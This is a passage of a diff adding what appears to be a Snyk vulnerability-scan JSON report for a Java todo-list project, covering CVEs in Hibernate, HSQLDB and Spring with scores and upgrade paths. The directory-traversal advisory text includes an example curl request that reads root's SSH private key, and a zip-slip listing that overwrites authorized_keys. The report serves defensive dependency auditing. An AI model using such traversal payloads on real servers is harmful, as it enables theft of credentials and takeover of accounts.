"functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.4.24.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": 
"https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. 
This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.3.18.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + 
"[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [ + false, + "org.hsqldb:hsqldb@2.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.18.RELEASE", + "org.springframework:spring-core@5.2.18.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, 
+ "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@5.2.19.RELEASE", + "org.springframework:spring-core@5.2.19.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": 
"SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + 
"cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). 
In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": 
"2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-context@3.2.9.RELEASE", + "org.springframework:spring-core@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
